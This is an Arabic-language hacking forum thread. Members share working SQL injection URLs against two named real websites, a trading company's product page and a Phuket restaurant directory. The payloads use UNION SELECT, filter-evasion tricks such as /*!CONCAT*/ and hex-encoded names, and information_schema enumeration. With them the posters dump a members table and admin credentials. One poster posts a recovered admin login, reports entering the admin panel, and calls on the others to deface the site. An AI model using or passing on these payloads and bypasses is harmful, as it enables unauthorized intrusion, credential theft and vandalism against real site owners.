http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,unhex(hex(column_name)),3,4,5+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)
إليكم وين صلت
أول الشي الموقع عليه حماية على أمر العواميد تم التخطي هكذا
بعدين في حماية على @@version تخطينا هكذا
الموقع عليه حماية على امر concat يا شباب تم التخطيب هكدا
إسم الجدول : members
إسم عامود الباس : pass_word
إسم عامود اليوزر : public
باس :7684
اليوزر : 4
لا أعرف إذا الشغل صحيح أم لا
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5
/*!CONCAT
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
السلام عليكم شباب
قلت قبل ما انام اجيب لكم موقع
اتفضلوا
http://www.aboutinphuket.com/phuket-about-restaurant-detail.php?rest_id=21
الموقع سهل الحقن طلعت بيانات الادمن بس الباسوورد مشفر بطريقة غريبة
smilies9
يالله اشوفكم بكره تصبحوا على خير![]()
http://www.aboutinphuket.com/phuket-about-restaurant-detail.php?rest_id=-21 UNION SELECT 1,group_concat(admin_name,0x3a,admin_id,0x3a,admin_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--
هلا اخي
تخطي مشكل معرفة الاصدار
/*!CONCATكود:http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5
الموقع مانع كلمة concat
والتخطي ب
كود:/*!CONCAT
على فكرة الموقع مانع الامر group_ الاستعلام بlimitكود:http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns
فيه جدول واحد فقط
جدول اليوزركود:http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 115, 37)
الحقنة كاملةكود:http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,/*!CONCAT(table_name,0x3a,column_name,0x3a,table_schema) ,3,4,5+from+information_schema.columns+where+table_name=0x6d656d62657273+limit+1,1
كود:http://www.faddoul-trade.com/product-det.php?l=2&id=-11 UNION /*!SELECT*/ 1,UNHEX(HEX(/*!CONCAT(user_name,0x3a,id,0x3a,pass_word))) ,3,4,5+from+members
وللبحث عن شيخ القبيلة استعمل limit
الحقنة كاملة
اليوزر aipكود:http://www.aboutinphuket.com/phuket-about-restaurant-detail.php?rest_id=-21 UNION SELECT 1,group_concat(admin_name,0x3a,admin_id,0x3a,admin_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+admin--
الباس j4**c+p(aip)
مسار اللوحة
http://www.aboutinphuket.com/admin/
تم دخولي للوحة في انتضاركم اخوتي للقضاء عليه
ع فكرة اخي فيكتور الباس مش مشفر هالباس عادي جرب ادخل وراح يدخلك
وانا جربت ادخل ودخلني عادي
لي رجعة في المساء لشوف اندكس حلو معلق عليه من طرف اخوتي الاعزاء
اخوكم ومحبكم عبد الصمد
والله يا إخوة ما بخفي عليكم الموقع بدو شغل